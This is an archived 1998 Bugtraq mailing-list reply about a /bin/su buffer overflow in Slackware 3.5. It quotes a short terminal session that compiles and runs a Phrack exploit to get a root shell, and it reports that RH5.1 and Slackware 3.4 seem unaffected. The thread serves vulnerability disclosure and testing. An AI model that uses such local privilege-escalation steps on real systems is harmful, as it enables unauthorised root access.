Bugtraq mailing list archives

Re: slackware-3.5 /bin/su buffer overflow

From: rickf () TRANSPECT NET (Rick Franchuk)
Date: Tue, 18 Aug 1998 08:48:02 -0700


On Tue, 18 Aug 1998, Chatchai Watchakit wrote:

From exploit4.c of Phrack 49 (P49-14) can exploit /bin/su of slackware-3.5

kernel 2.0.34

---------------------

endeavor:~$ gcc -o exploit4 exploit4.c
endeavor:~$ ./exploit4
Using address: 0xbffffb20
bash$ /bin/su $RET
bash#

---------------------


Tested on RH5.1 and Slackware 3.4, neither appear to be vulnerable to this
script as-is.

--
  __________________________________________
 |                                          |
 |  Rick Franchuk  -  TranSpecT Consulting  |
 |_______                            _______|
         \mailto:rickf () transpect net/
          \_____ICQ_#_4435025______/

Current thread:

Real Audio Server Version 5 bug? De_Paddy (Aug 17)
- Re: Real Audio Server Version 5 bug? Peter W (Aug 17)
- slackware-3.5 /bin/su buffer overflow Chatchai Watchakit (Aug 18)
  - Re: slackware-3.5 /bin/su buffer overflow Rick Franchuk (Aug 18)